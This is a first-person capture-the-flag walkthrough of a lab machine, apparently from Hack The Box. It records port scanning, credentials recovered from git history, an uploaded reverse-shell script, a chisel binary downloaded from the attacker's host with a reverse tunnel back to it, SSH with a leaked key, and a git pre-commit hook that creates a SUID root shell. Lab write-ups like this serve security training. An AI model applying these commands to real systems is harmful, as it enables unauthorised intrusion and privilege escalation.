nmap -p- --min-rate 10000 10.10.11.164 -Pn 
After detection of open ports, let's do greater scan for these ports.
nmap -A -sC -sV -p22,80 10.10.11.164 -Pn 
Now, I will directory enumeration via gobuster command.
gobuster dir -u http://10.10.11.164/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 40
While opening /download endpoint, I download source.zip file.
I cd into .git directory and do enumeration for git repository.
First, I see branches of this repository via git branch -a.
I switch into dev branch from public branch via git checkout command.
git checkout dev
Let's look at last commits via git log command.
git log --name-only --oneline
I go back to commit named as 'a76f8f7'.
git checkout a76f8f7 -- app/.vscode/settings.json
I grab credentials from this settings.json file.
dev01:Soulless_Developer#2022
While browsing /console endpoint, I confront with Python Flask Debug page, but there's PIN already set.
To debug this password, I found such blog.
Another way to get shell is easy for me that uploading file into location where I now.
That's location called /app/app/views.py via reverse shell content.
I upload this malicious views.py script via file upload by catching request.
Now, while browsing /dr4ks endpoint, I will get reverse shell.
I got reverse shell from port (1337).
Let's make interactive shell.
python3 -c 'import pty; pty.spawn("sh")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
Now, I got shell, from my nmap scan there's service running on port 3000, let's curl this application via curl.
wget 172.17.0.1:3000 -O-
That's Gitea application, let's do HTTP Tunneling.
I do this via chisel binary.
First, we need to open http server to serve my malicous chisel binary.
python3 -m http.server --bind 10.10.14.10 8080
Then, we need to get this file via wget binary.
wget http://10.10.14.10:8080/chisel_1.9.1_linux_amd64
Let's create HTTP tunnel, for this I need to open listener.
chisel server -p 8000 --reverse
Now, we need to write below command on target machine.
./chisel_1.9.1_linux_amd64 client 10.10.14.10:8000 R:3000:172.17.0.1:3000
While browsing localhost:3000, I can see Gitea server.
I login into this Gitea via credentials which I got from last commits of repository.
dev01:Soulless_Developer#2022
I found private_key(id_rsa) file on repository.
Let's copy this id_rsa file and save it.
chmod 600 id_rsa
ssh -i id_rsa dev01@10.10.11.164user.txt
Now, I will upload pspy64 into machine and run.
I see one interesting bash script that called /usr/local/bin/git-sync.
I read this and it is bash script.
For this, I will use git hooks which are scripts are run various events on git repository.
So that, I will write malicious code which copies /bin/bash file named as dr4ks and give SUID privilege to this file.
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/dr4ks\nchown root:root /tmp/dr4ks\nchmod 4777 /tmp/dr4ks' > pre-commit
chmod +x pre-commit
Now we can run this dr4ks binary via -p option.
root.txt
